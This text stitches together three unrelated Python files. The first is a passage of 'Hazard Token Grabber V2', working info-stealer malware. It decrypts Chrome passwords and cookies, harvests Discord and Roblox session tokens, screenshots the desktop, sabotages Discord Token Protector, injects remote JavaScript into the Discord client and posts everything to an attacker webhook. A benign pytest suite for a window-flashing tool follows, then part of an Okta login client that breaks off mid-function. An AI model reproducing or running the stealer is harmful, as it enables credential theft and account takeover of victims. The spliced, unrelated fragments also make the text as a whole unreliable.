iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
except Exception:
return "Failed to decrypt password"
class Hazard_Token_Grabber_V2(functions):
def __init__(self):
super().__init__()
self.webhook = config.get('webhook')
self.baseurl = "https://discord.com/api/v9/users/@me"
self.appdata = os.getenv("localappdata")
self.roaming = os.getenv("appdata")
self.tempfolder = os.getenv("temp")+"\\Hazard_Token_Grabber_V2"
self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"
self.encrypted_regex = r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*"
try:
os.mkdir(os.path.join(self.tempfolder))
except Exception:
pass
self.tokens = []
self.robloxcookies = []
self.files = ""
self.bypassBetterDiscord()
self.bypassTokenProtector()
if not os.path.exists(self.appdata+'\\Google\\Chrome\\User Data') or not os.path.exists(self.appdata+'\\Google\\Chrome\\User Data\\Local State'):
self.files += f"{os.getlogin()} doesn't have google installed\n"
else:
self.grabPassword()
self.grabCookies()
Thread(target=self.screenshot).start()
Thread(target=self.killDiscord).start()
self.grabTokens()
self.neatifyTokens()
self.grabRobloxCookie()
for i in ["Google Passwords.txt", "Google Cookies.txt", "Discord Info.txt", "Discord backupCodes.txt"]:
if os.path.exists(self.tempfolder+os.sep+i):
with open(self.tempfolder+os.sep+i, "r", encoding="cp437") as ff:
x = ff.read()
if not x:
with open(self.tempfolder+os.sep+i, "w", encoding="cp437") as f:
f.write("Made by Rdimo | https://github.com/Rdimo/Hazard-Token-Grabber-V2\n\n")
with open(self.tempfolder+os.sep+i, "a", encoding="cp437") as fp:
fp.write(x+"\n\nMade by Rdimo | https://github.com/Rdimo/Hazard-Token-Grabber-V2")
else:
try:
os.remove(self.tempfolder+os.sep+i)
except Exception:
print("ok")
self.SendInfo()
self.injector()
shutil.rmtree(self.tempfolder)
def checkToken(self, tkn):
try:
r = requests.get(self.baseurl, headers=self.getHeaders(tkn))
if r.status_code == 200 and tkn not in self.tokens:
self.tokens.append(tkn)
except requests.exceptions:
pass
def injector(self):
for _dir in os.listdir(self.appdata):
if 'discord' in _dir.lower():
for __dir in os.listdir(os.path.abspath(self.appdata+os.sep+_dir)):
if match(r'app-(\d*\.\d*)*', __dir):
abspath = os.path.abspath(self.appdata+os.sep+_dir+os.sep+__dir)
f = requests.get("https://raw.githubusercontent.com/Rdimo/Discord-Injection/master/injection.js").text.replace("%WEBHOOK%", self.webhook)
with open(abspath+'\\modules\\discord_desktop_core-2\\discord_desktop_core\\index.js', 'w', encoding="utf-8") as indexFile:
indexFile.write(f)
os.startfile(abspath+os.sep+_dir+'.exe')
def killDiscord(self):
for proc in psutil.process_iter():
if any(procstr in proc.name().lower() for procstr in\
['discord', 'discordtokenprotector', 'discordcanary', 'discorddevelopment', 'discordptb']):
try:
proc.kill()
except psutil.NoSuchProcess:
pass
def bypassTokenProtector(self):
#fucks up the discord token protector by https://github.com/andro2157/DiscordTokenProtector
tp = f"{self.roaming}\\DiscordTokenProtector\\"
config = tp+"config.json"
for i in ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]:
try:
os.remove(tp+i)
except Exception:
pass
try:
with open(config) as f:
item = json.load(f)
item['auto_start'] = False
item['auto_start_discord'] = False
item['integrity'] = False
item['integrity_allowbetterdiscord'] = False
item['integrity_checkexecutable'] = False
item['integrity_checkhash'] = False
item['integrity_checkmodule'] = False
item['integrity_checkscripts'] = False
item['integrity_checkresource'] = False
item['integrity_redownloadhashes'] = False
item['iterations_iv'] = 364
item['iterations_key'] = 457
item['version'] = 69420
with open(config, 'w') as f:
json.dump(item, f, indent=2, sort_keys=True)
with open(config, 'a') as f:
f.write("\n\n//Rdimo just shit on this token protector | https://github.com/Rdimo")
except Exception:
pass
def bypassBetterDiscord(self):
bd = self.roaming+"\\BetterDiscord\\data\\betterdiscord.asar"
if os.path.exists(bd):
x = "api/webhooks"
with open(bd, 'r', encoding="cp437", errors='ignore') as f:
txt = f.read()
content = txt.replace(x, 'RdimoTheGoat')
with open(bd, 'w', newline='', encoding="cp437", errors='ignore') as f:
f.write(content)
def getProductValues(self):
try:
wkey = subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault", creationflags=0x08000000).decode().rstrip()
except:
wkey = "N/A (Likely Pirated)"
try:
productName = subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName", creationflags=0x08000000).decode().rstrip()
except:
productName = "N/A"
return [productName, wkey]
def grabPassword(self):
master_key = self.get_master_key(self.appdata+'\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
try:
shutil.copy2(login_db, "Loginvault.db")
except Exception:
pass
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
with open(self.tempfolder+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
try:
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
for r in cursor.fetchall():
url = r[0]
username = r[1]
encrypted_password = r[2]
decrypted_password = self.decrypt_val(encrypted_password, master_key)
if url != "":
f.write(f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
except Exception:
pass
cursor.close()
conn.close()
try:
os.remove("Loginvault.db")
except Exception:
pass
def grabCookies(self):
master_key = self.get_master_key(self.appdata+'\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Network\\cookies'
try:
shutil.copy2(login_db, "Loginvault.db")
except Exception:
pass
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
with open(self.tempfolder+"\\Google Cookies.txt", "w", encoding="cp437", errors='ignore') as f:
try:
cursor.execute("SELECT host_key, name, encrypted_value from cookies")
for r in cursor.fetchall():
host = r[0]
user = r[1]
decrypted_cookie = self.decrypt_val(r[2], master_key)
if host != "": f.write(f"Host: {host}\nUser: {user}\nCookie: {decrypted_cookie}\n\n")
if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_' in decrypted_cookie: self.robloxcookies.append(decrypted_cookie)
except Exception:
pass
cursor.close()
conn.close()
try:
os.remove("Loginvault.db")
except Exception:
pass
def grabRobloxCookie(self):
try:
self.robloxcookies.append(subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000).decode().rstrip())
except Exception:
pass
if self.robloxcookies:
with open(self.tempfolder+"\\Roblox Cookies.txt", "w") as f:
for i in self.robloxcookies: f.write(i+'\n')
def grabTokens(self):
paths = {
'Discord': self.roaming + r'\\discord\\Local Storage\\leveldb\\',
'Discord Canary': self.roaming + r'\\discordcanary\\Local Storage\\leveldb\\',
'Lightcord': self.roaming + r'\\Lightcord\\Local Storage\\leveldb\\',
'Discord PTB': self.roaming + r'\\discordptb\\Local Storage\\leveldb\\',
'Opera': self.roaming + r'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
'Opera GX': self.roaming + r'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
'Amigo': self.appdata + r'\\Amigo\\User Data\\Local Storage\\leveldb\\',
'Torch': self.appdata + r'\\Torch\\User Data\\Local Storage\\leveldb\\',
'Kometa': self.appdata + r'\\Kometa\\User Data\\Local Storage\\leveldb\\',
'Orbitum': self.appdata + r'\\Orbitum\\User Data\\Local Storage\\leveldb\\',
'CentBrowser': self.appdata + r'\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
'7Star': self.appdata + r'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
'Sputnik': self.appdata + r'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
'Vivaldi': self.appdata + r'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
'Chrome SxS': self.appdata + r'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
'Chrome': self.appdata + r'\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
'Epic Privacy Browser': self.appdata + r'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
'Microsoft Edge': self.appdata + r'\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\',
'Uran': self.appdata + r'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
'Yandex': self.appdata + r'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
'Brave': self.appdata + r'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
'Iridium': self.appdata + r'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
}
for _, path in paths.items():
if not os.path.exists(path):
continue
if not "discord" in path:
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (self.regex):
for token in findall(regex, line):
self.checkToken(token)
else:
if os.path.exists(self.roaming+'\\discord\\Local State'):
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for y in findall(self.encrypted_regex, line):
token = self.decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), self.get_master_key(self.roaming+'\\discord\\Local State'))
self.checkToken(token)
if os.path.exists(self.roaming+"\\Mozilla\\Firefox\\Profiles"):
for path, _, files in os.walk(self.roaming+"\\Mozilla\\Firefox\\Profiles"):
for _file in files:
if not _file.endswith('.sqlite'):
continue
for line in [x.strip() for x in open(f'{path}\\{_file}', errors='ignore').readlines() if x.strip()]:
for regex in (self.regex):
for token in findall(regex, line):
self.checkToken(token)
def neatifyTokens(self):
f = open(self.tempfolder+"\\Discord Info.txt", "w", encoding="cp437", errors='ignore')
for token in self.tokens:
j = requests.get(self.baseurl, headers=self.getHeaders(token)).json()
user = j.get('username') + '#' + str(j.get("discriminator"))
badges = ""
flags = j['flags']
if (flags == 1): badges += "Staff, "
if (flags == 2): badges += "Partner, "
if (flags == 4): badges += "Hypesquad Event, "
if (flags == 8): badges += "Green Bughunter, "
if (flags == 64): badges += "Hypesquad Bravery, "
if (flags == 128): badges += "HypeSquad Brillance, "
if (flags == 256): badges += "HypeSquad Balance, "
if (flags == 512): badges += "Early Supporter, "
if (flags == 16384): badges += "Gold BugHunter, "
if (flags == 131072): badges += "Verified Bot Developer, "
if (badges == ""): badges = "None"
email = j.get("email")
phone = j.get("phone") if j.get("phone") else "No Phone Number attached"
try:
nitro_data = requests.get(self.baseurl+'/billing/subscriptions', headers=self.getHeaders(token)).json()
except Exception:
pass
has_nitro = False
has_nitro = bool(len(nitro_data) > 0)
try:
billing = bool(len(json.loads(requests.get(self.baseurl+"/billing/payment-sources", headers=self.getHeaders(token)).text)) > 0)
except Exception:
pass
f.write(f"{' '*17}{user}\n{'-'*50}\nToken: {token}\nHas Billing: {billing}\nNitro: {has_nitro}\nBadges: {badges}\nEmail: {email}\nPhone: {phone}\n\n")
f.close()
def screenshot(self):
image = ImageGrab.grab(
bbox=None,
include_layered_windows=False,
all_screens=False,
xdisplay=None
)
image.save(self.tempfolder + "\\Screenshot.png")
image.close()
def SendInfo(self):
wname = self.getProductValues()[0]
wkey = self.getProductValues()[1]
ip = country = city = region = googlemap = "None"
try:
data = requests.get("https://ipinfo.io/json").json()
ip = data['ip']
city = data['city']
country = data['country']
region = data['region']
googlemap = "https://www.google.com/maps/search/google+map++" + data['loc']
except Exception:
pass
_zipfile = os.path.join(self.appdata, f'Hazard.V2-[{os.getlogin()}].zip')
zipped_file = zipfile.ZipFile(_zipfile, "w", zipfile.ZIP_DEFLATED)
abs_src = os.path.abspath(self.tempfolder)
for dirname, _, files in os.walk(self.tempfolder):
for filename in files:
absname = os.path.abspath(os.path.join(dirname, filename))
arcname = absname[len(abs_src) + 1:]
zipped_file.write(absname, arcname)
zipped_file.close()
files = os.listdir(self.tempfolder)
for f in files:
self.files += f"\n{f}"
self.fileCount = f"{len(files)} Files Found: "
embed = {
"avatar_url":"https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Big_hazard.gif",
"embeds": [
{
"author": {
"name": "Hazard Token Grabber.V2",
"url": "https://github.com/Rdimo/Hazard-Token-Grabber-V2",
"icon_url": "https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Small_hazard.gif"
},
"description": f'**{os.getlogin()}** Just ran Hazard Token Grabber.V2\n```fix\nComputerName: {os.getenv("COMPUTERNAME")}\n{wname}: {wkey if wkey else "No Product Key"}\nIP: {ip}\nCity: {city}\nRegion: {region}\nCountry: {country}```[Google Maps Location]({googlemap})\n```fix\n{self.fileCount}{self.files}```',
"color": 16119101,
"thumbnail": {
"url": "https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Hazard.gif"
},
"footer": {
"text": "Rdimo#6969 https://github.com/Rdimo/Hazard-Token-Grabber-V2"
}
}
]
}
requests.post(self.webhook, json=embed)
requests.post(self.webhook, files={'upload_file': open(_zipfile,'rb')})
os.remove(_zipfile)
if __name__ == "__main__":
if os.name == "nt": Hazard_Token_Grabber_V2()
|
test_flasher.py
|
"""Test suite for the server module."""
from threading import Thread
from time import sleep
try:
from unittest.mock import (
call,
MagicMock,
)
except ImportError:
from mock import (
call,
MagicMock,
)
from pytest import (
approx,
mark,
)
import flashfocus.xutil as xutil
from test.helpers import (
change_focus,
SelfDestructingFocusWait,
WindowWatcher,
)
@mark.parametrize('pre_opacity', [
(0.8), (1), (None), (0.5)
])
def test_flash_window(flasher, window, pre_opacity):
if pre_opacity:
xutil.set_opacity(window, pre_opacity)
expected_opacity = (
[pre_opacity] +
flasher.compute_flash_series(pre_opacity) +
[pre_opacity])
# WindowWatcher collapses runs of the same value
if all(x == expected_opacity[0] for x in expected_opacity):
expected_opacity = [expected_opacity[0]]
watcher = WindowWatcher(window)
watcher.start()
flasher.flash_window(window)
assert watcher.report() == approx(expected_opacity, 0.01)
def test_flash_nonexistant_window_ignored(flasher):
flasher.flash_window(0)
@mark.parametrize('focus_indices,flash_indices', [
# Test normal usage
([1, 0, 1], [1, 0, 1]),
# Test that focusing on same window twice only flashes once
([0, 0], [0])
])
def test_monitor_focus(flasher, windows, focus_indices, flash_indices,
monkeypatch):
focus_shifts = [windows[i] for i in focus_indices]
expected_calls = [call(windows[i]) for i in flash_indices]
flasher.flash_window = MagicMock()
monkeypatch.setattr(
xutil, 'wait_for_focus_shift',
SelfDestructingFocusWait(len(focus_indices) + 2))
p = Thread(target=flasher.monitor_focus)
p.start()
for window in focus_shifts:
change_focus(window)
sleep(0.2)
# This would normally be done by the flash_window method
flasher.locked_windows.discard(window)
p.join()
assert flasher.flash_window.call_args_list == expected_calls
@mark.parametrize(
'flash_opacity,preflash_opacity,ntimepoints,expected_result', [
# test typical usecase
(0.8, None, 4, [0.8, 0.85, 0.9, 0.95]),
# test that it still works when flash opacity > preflash opacity
(1, 0.8, 4, [1, 0.95, 0.9, 0.85]),
# test that opacity=1 gives same result as opacity=none
(0.8, 1, 4, [0.8, 0.85, 0.9, 0.95]),
# test for single chunk
(0.8, 1, 1, [0.8])
]
)
def test_compute_flash_series(flash_opacity, preflash_opacity, ntimepoints,
expected_result, flasher):
flasher.flash_opacity = flash_opacity
flasher.ntimepoints = ntimepoints
assert (flasher.compute_flash_series(preflash_opacity) ==
approx(expected_result, 0.0001))
if preflash_opacity:
assert (flasher.flash_series_hash[preflash_opacity] ==
approx(expected_result, 0.0001))
|
okta.py
|
"""
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
import base64
import copy
import getpass
import re
import socket
import time
import uuid
import webbrowser
from codecs import decode
from multiprocessing import Process
from urllib.parse import parse_qs
from urllib.parse import urlparse, quote
import keyring
import requests
from bs4 import BeautifulSoup
from fido2.utils import websafe_decode
from keyring.backends.fail import Keyring as FailKeyring
from keyring.errors import PasswordDeleteError
from requests.adapters import HTTPAdapter, Retry
from gimme_aws_creds.u2f import FactorU2F
from gimme_aws_creds.webauthn import WebAuthnClient, FakeAssertion
from . import errors, ui, version, duo
from .errors import GimmeAWSCredsMFAEnrollStatus
from .registered_authenticators import RegisteredAuthenticators
class OktaClient(object):
"""
The Okta Client Class performs the necessary API
calls to Okta to get temporary AWS credentials. An
Okta API key and URL must be provided.
"""
KEYRING_SERVICE = 'gimme-aws-creds'
KEYRING_ENABLED = not isinstance(keyring.get_keyring(), FailKeyring)
def __init__(self, gac_ui, okta_org_url, verify_ssl_certs=True, device_token=None):
"""
:type gac_ui: ui.UserInterface
:param okta_org_url: Base URL string for Okta IDP.
:param verify_ssl_certs: Enable/disable SSL verification
"""
self.ui = gac_ui
self._okta_org_url = okta_org_url
self._verify_ssl_certs = verify_ssl_certs
if verify_ssl_certs is False:
requests.packages.urllib3.disable_warnings()
self._username = None
self._password = None
self._preferred_mfa_type = None
self._mfa_code = None
self._remember_device = None
self._use_oauth_access_token = False
self._use_oauth_id_token = False
self._oauth_access_token = None
self._oauth_id_token = None
self._jar = requests.cookies.RequestsCookieJar()
# Allow up to 5 retries on requests to Okta in case we have network issues
self._http_client = requests.Session()
self._http_client.cookies = self._jar
self.device_token = device_token
retries = Retry(total=5, backoff_factor=1,
method_whitelist=['GET', 'POST'])
self._http_client.mount('https://', HTTPAdapter(max_retries=retries))
@property
def device_token(self):
return self._http_client.cookies.get('DT')
@device_token.setter
def device_token(self, device_token):
if device_token is not None:
match = re.search(r'^https://(.*)/?', self._okta_org_url)
self._http_client.cookies.set('DT', device_token, domain=match.group(1), path='/')
def set_username(self, username):
self._username = username
def set_password(self, password):
self._password = password
def set_preferred_mfa_type(self, preferred_mfa_type):
self._preferred_mfa_type = preferred_mfa_type
def set_mfa_code(self, mfa_code):
self._mfa_code = mfa_code
def set_remember_device(self, remember_device):
self._remember_device = bool(remember_device)
def use_oauth_access_token(self, val=True):
self._use_oauth_access_token = val
def use_oauth_id_token(self, val=True):
self._use_oauth_id_token = val
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def stepup_auth_saml(self, embed_link, state_token=None):
""" Login to a SAML-protected service using the Step-up authentication flow"""
api_response = self.stepup_auth(embed_link, state_token)
# if a session token is in the API response, we can use that to authenticate
if 'sessionToken' in api_response:
saml_response = self.get_saml_response(
embed_link + '?sessionToken=' + api_response['sessionToken'])
else:
saml_response = self.get_saml_response(
api_response['_links']['next']['href'])
login_result = self._http_client.post(
saml_response['TargetUrl'],
data=saml_response,
verify=self._verify_ssl_certs
)
return login_result.text
def auth(self):
""" Login to Okta using the authentication API"""
flow_state = self._login_username_password(None, self._okta_org_url + '/api/v1/authn')
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('apiResponse', {}).get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def auth_session(self, **kwargs):
""" Authenticate the user and return the Okta Session ID and username"""
login_response = self.auth()
session_url = self._okta_org_url + '/login/sessionCookieRedirect'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
params = {
'token': login_response['sessionToken'],
'redirectUrl': redirect_uri
}
response = self._http_client.get(
session_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
return {
"username": login_response['_embedded']['user']['profile']['login'],
"session": response.cookies['sid'],
"device_token": self._http_client.cookies['DT']
}
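    # Usage sketch (assumed names, not part of this class): a caller typically builds a
    # client with a ui.UserInterface and the Okta org URL, sets credentials, then calls
    # auth_session(), e.g.
    #   client = OktaClient(gac_ui, "https://example.okta.com")
    #   client.set_username("user@example.com"); client.set_password(password)
    #   session = client.auth_session()  # -> {"username": ..., "session": sid, "device_token": ...}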
def auth_oauth(self, client_id, **kwargs):
""" Login to Okta and retrieve access token, ID token or both """
login_response = self.auth()
if 'access_token' not in kwargs:
access_token = True
else:
access_token = kwargs['access_token']
if 'id_token' not in kwargs:
id_token = False
else:
id_token = kwargs['id_token']
if 'scopes' not in kwargs:
scopes = ['openid']
else:
scopes = kwargs['scopes']
response_types = []
if id_token is True:
response_types.append('id_token')
if access_token is True:
response_types.append('token')
if 'authorization_server' not in kwargs:
oauth_url = self._okta_org_url + '/oauth2/v1/authorize'
else:
oauth_url = self._okta_org_url + '/oauth2/' + kwargs['authorization_server'] + '/v1/authorize'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
if 'nonce' not in kwargs:
nonce = uuid.uuid4().hex
else:
nonce = kwargs['nonce']
if 'state' not in kwargs:
state = 'auth_oauth'
else:
state = kwargs['state']
params = {
'sessionToken': login_response['sessionToken'],
'client_id': client_id,
'redirect_uri': redirect_uri,
'nonce': nonce,
'state': state,
'response_type': ' '.join(response_types),
'scope': ' '.join(scopes)
}
response = self._http_client.get(
oauth_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
query_result = parse_qs(url_parse_results.fragment)
tokens = {}
if 'access_token' in query_result:
tokens['access_token'] = query_result['access_token'][0]
self._oauth_access_token = query_result['access_token'][0]
if 'id_token' in query_result:
tokens['id_token'] = query_result['id_token'][0]
self._oauth_id_token = query_result['id_token'][0]
return tokens
@staticmethod
def _get_headers():
"""sets the default headers"""
headers = {
'User-Agent': "gimme-aws-creds {}".format(version),
'Accept': 'application/json',
'Content-Type': 'application/json',
}
return headers
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self._http_client.get(
embed_link, allow_redirects=False)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self._http_client.post(
self._okta_org_url + '/api/v1/authn',
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return {'stateToken': state_token, 'apiResponse': response.json()}
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']), 2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
return self._login_username_password(state_token, login_data['_links']['next']['href'])
elif status == 'LOCKED_OUT':
raise errors.GimmeAWSCredsError("Your Okta access has been locked out due to failed login attempts.", 2)
elif status == 'MFA_ENROLL':
raise GimmeAWSCredsMFAEnrollStatus()
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if login_data['_embedded']['factor']['factorType'] == 'u2f':
return self._check_u2f_result(state_token, login_data)
if login_data['_embedded']['factor']['factorType'] == 'webauthn':
return self._check_webauthn_result(state_token, login_data)
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _print_correct_answer(self, answer):
""" prints the correct answer to the additional factor authentication step in Okta Verify"""
self.ui.info("Additional factor correct answer is: " + str(answer))
def _login_username_password(self, state_token, url):
""" login to Okta with a username and password"""
creds = self._get_username_password_creds()
login_json = {
'username': creds['username'],
'password': creds['password']
}
# If this isn't a Step-up auth flow, we won't have a stateToken
if state_token is not None:
login_json['stateToken'] = state_token
response = self._http_client.post(
url,
json=login_json,
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if response.status_code == 200:
pass
# Handle known Okta error codes
# ref: https://developer.okta.com/docs/reference/error-codes/#example-errors-listed-by-http-return-code
elif response.status_code in [400, 401, 403, 404, 409, 429, 500, 501, 503]:
if response_data['errorCode'] == "E0000004":
if self.KEYRING_ENABLED:
try:
self.ui.info("Stored password is invalid, clearing. Please try again")
keyring.delete_password(self.KEYRING_SERVICE, creds['username'])
except PasswordDeleteError:
pass
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(response_data['errorSummary'], response_data['errorCode']), 2)
# If the error code isn't one we know how to handle, raise an exception
else:
response.raise_for_status()
func_result = {'apiResponse': response_data}
if 'stateToken' in response_data:
func_result['stateToken'] = response_data['stateToken']
return func_result
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_input_webauthn_challenge(self, state_token, factor):
""" Retrieve nonce """
response = self._http_client.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Challenge with security keys ...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
@staticmethod
def get_available_socket():
"""Get available socket, but requesting 0 and allowing OS to provide ephemeral open port"""
s = socket.socket()
s.bind(('127.0.0.1', 0))
server_address = s.getsockname()
return server_address
def _login_duo_challenge(self, state_token, factor):
""" Duo MFA challenge """
passcode = self._mfa_code
if factor['factorType'] is None:
# Prompt user for which Duo factor to use
raise duo.FactorRequired(factor['id'], state_token)
if factor['factorType'] == "passcode" and not passcode:
try:
passcode = self.ui.input("Enter verification code(remember to refresh token between uses): ")
except Exception:
raise duo.PasscodeRequired(factor['id'], state_token)
response_data = self._get_response_data(factor['_links']['verify']['href'], state_token)
verification = response_data['_embedded']['factor']['_embedded']['verification']
socket_addr = self.get_available_socket()
auth = None
duo_client = duo.Duo(self.ui, verification, state_token, socket_addr, factor['factorType'])
if factor['factorType'] == "web":
# Duo Web via local browser
self.ui.info("Duo required; opening browser...")
proc = Process(target=duo_client.trigger_web_duo)
proc.start()
time.sleep(2)
webbrowser.open_new('http://{host}:{port}/duo.html'.format(host=socket_addr[0], port=socket_addr[1]))
elif factor['factorType'] == "passcode":
# Duo auth with OTP code without a browser
self.ui.info("Duo required; using OTP...")
auth = duo_client.trigger_duo(passcode=passcode)
else:
# Duo Auth without the browser
self.ui.info("Duo required; check your phone...")
auth = duo_client.trigger_duo()
if auth is not None:
self.mfa_callback(auth, verification, state_token)
try:
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
while response_data['status'] != 'SUCCESS':
if response_data.get('factorResult', 'REJECTED') == 'REJECTED':
self.ui.warning("Duo Push REJECTED")
return None
if response_data.get('factorResult', 'TIMEOUT') == 'TIMEOUT':
self.ui.warning("Duo Push TIMEOUT")
return None
self.ui.info("Waiting for MFA success...")
time.sleep(2)
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
except KeyboardInterrupt:
self.ui.warning("User canceled waiting for MFA success.")
raise
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
# return None
def _get_response_data(self, href, state_token):
response = self._http_client.post(href,
params={'rememberDevice': self._remember_device},
